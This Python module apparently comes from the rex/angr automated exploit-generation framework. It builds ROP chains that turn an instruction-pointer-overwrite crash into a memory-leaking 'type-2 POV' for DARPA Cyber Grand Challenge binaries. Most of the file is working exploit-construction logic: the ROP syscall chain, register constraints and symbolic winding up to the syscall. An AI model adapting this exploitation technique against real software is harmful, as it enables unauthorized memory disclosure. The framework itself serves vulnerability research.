import angrop
import logging
import claripy
from rex import Vulnerability
from rex.exploit import CannotExploit
from rex.exploit.cgc import CGCType2RopExploit
from ..technique import Technique

l = logging.getLogger("rex.exploit.techniques.rop_leak_memory")

class RopLeakMemory(Technique):
    '''
    Very CGC specific leaking technique.

    Builds a ROP chain that performs syscall 2 (``transmit``) with
    ``[1, address, length, 0]`` as arguments, producing a type-2 POV.
    Registers the ROP chain cannot set are instead constrained
    "circumstantially" on the crashing state.
    '''

    name = "rop_leak_memory"

    applicable_to = ['cgc']

    # this technique should create an exploit which is a type2 pov
    pov_type = 2

    generates_pov = True

    @staticmethod
    def _get_writable_pages(state):
        '''
        Collect the writable memory of ``state`` as merged address ranges.

        :param state: the state whose memory pages are inspected.
        :return: a list of ``(start, end)`` tuples sorted by address, where
                 ``end`` is one past the last byte of the range; runs of
                 adjacent writable pages are merged into a single range.
        '''
        # NOTE(review): relies on the private ``state.memory._pages`` mapping
        # (page number -> page object, 0x1000-byte pages); confirm against the
        # angr version in use.
        ranges = []
        curr_start = -1
        last_addr = -1
        for page_num, page in sorted(state.memory._pages.items(), key=lambda x: x[0]):
            # bit 0x2 of the page permissions is treated as "writable"
            if not state.solver.eval(page.permissions) & 0x2:
                continue
            page_addr = page_num * 0x1000
            if page_addr != last_addr:
                # not contiguous with the previous writable page: close the
                # range being built (if any) and start a new one here
                if last_addr != -1:
                    ranges.append((curr_start, last_addr))
                curr_start = page_addr
            last_addr = page_addr + 0x1000
        if last_addr != -1:
            ranges.append((curr_start, last_addr))
        return ranges


    def _get_circumstantial_constraints(self, state, rop_uncontrolled):
        '''
        Constrain registers that ROP cannot set to values usable by the leak.

        For every register the ROP chain cannot control, require that the
        register already holds (on ``state``) a value suitable for the
        syscall-2 (``transmit``) call issued by this technique.

        :param state: the state whose registers are constrained.
        :param rop_uncontrolled: names of registers ROP cannot set.
        :return: a list of claripy boolean constraints (empty if every
                 register is ROP-controllable).
        '''
        constraints = [ ]
        for register in rop_uncontrolled:
            # eax is the syscall number: it must be 2
            if register == "eax":
                constraints.append(state.regs.eax == 2)
            # ebx is the file descriptor: it must be 1 (stdout)
            if register == "ebx":
                constraints.append(state.regs.ebx == 1)
            # ecx is the buffer: a 4-byte read starting there must stay inside
            # the page at 0x4347c000 (the CGC flag page a type-2 POV leaks)
            if register == "ecx":
                constraints.append(state.regs.ecx >= 0x4347c000)
                constraints.append(state.regs.ecx <= (0x4347d000 - 4))
            # edx is the length: it must be just above 4 bytes
            if register == "edx":
                constraints.append(state.regs.edx > 0x4)
            # esi must be NULL or point at 4 writable bytes
            if register == "esi":
                # Seeding with NULL matches the 0x0 the ROP chain itself passes
                # for this argument, and keeps the disjunction non-empty when
                # the state has no writable pages (indexing an empty list here
                # would raise IndexError).
                combine_cons = state.regs.esi == 0
                for page_start, page_end in self._get_writable_pages(state):
                    in_page = claripy.And(state.regs.esi >= page_start,
                                          state.regs.esi <= (page_end - 4))
                    combine_cons = claripy.Or(combine_cons, in_page)

                constraints.append(combine_cons)

        return constraints

    def check(self):
        '''
        Decide whether this technique can be attempted on the crash.

        :return: True if a ROP object is available and the crash controls
                 (fully or partially) the instruction pointer; otherwise
                 records a failure reason and returns False.
        '''

        if self.rop is None:
            self.check_fail_reason("No rop available.")
            return False

        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        return True


    def apply(self, **kwargs):
        '''
        Build a type-2 POV that leaks memory via a ROP ``transmit`` chain.

        :return: a ``CGCType2RopExploit`` for a copy of the crash whose state
                 has been wound up to the syscall.
        :raises CannotExploit: if the circumstantial constraints for
                 registers ROP cannot set are unsatisfiable, either on the
                 crashing state or on the wound-up state.
        '''

        state = self.crash.state
        need_control = ['eax', 'ebx', 'ecx', 'edx', 'esi']
        rop_uncontrolled = [ ]
        # any one of these we can't control with rop?
        # (probe each register with a dummy value; the chain is discarded)
        for register in need_control:
            try:
                self.rop.set_regs(**{register: 0x41414141})
            except angrop.errors.RopException:
                l.debug("unable to set register %s with rop in leaker", register)
                rop_uncontrolled.append(register)

        constraints = self._get_circumstantial_constraints(state,
                rop_uncontrolled)

        if not state.satisfiable(extra_constraints=constraints):
            raise CannotExploit("circumstantial constraints generated were unsatisfactory for a rop leaker")

        # symbolic address/length of the leak, solved later by the exploit
        address_var = claripy.BVS('address_var', self.crash.project.arch.bits, explicit_name=True)
        length_var = claripy.BVS('length_var', self.crash.project.arch.bits, explicit_name=True)
        chain = self.rop.do_syscall(2, [1, address_var, length_var, 0x0],
                ignore_registers=rop_uncontrolled)

        chain, chain_addr = self._ip_overwrite_with_chain(chain)

        ccp = self.crash.copy()

        # add the constraints introduced by rop
        ccp.state.solver.add(*chain._blank_state.solver.constraints)

        chain_bv = chain.payload_bv()

        # force the memory where the chain lives to equal the chain payload
        ch_sym_mem = ccp.state.memory.load(chain_addr, len(chain_bv)//8)
        ccp.state.add_constraints(ch_sym_mem == chain_bv)

        # windup and add constraints
        new_st = self._windup_to_syscall(ccp.state)

        # registers ROP could not set must still hold usable values at the
        # syscall itself, so re-apply the constraints on the wound-up state
        constraints = self._get_circumstantial_constraints(new_st, rop_uncontrolled)
        for con in constraints:
            new_st.add_constraints(con)

        # mirror the earlier check: an unsatisfiable wound-up state cannot
        # yield a working POV
        if not new_st.satisfiable():
            raise CannotExploit("circumstantial constraints were unsatisfiable after winding up to the syscall")

        ccp.state = new_st

        return CGCType2RopExploit(ccp, ch_sym_mem, address_var, length_var)
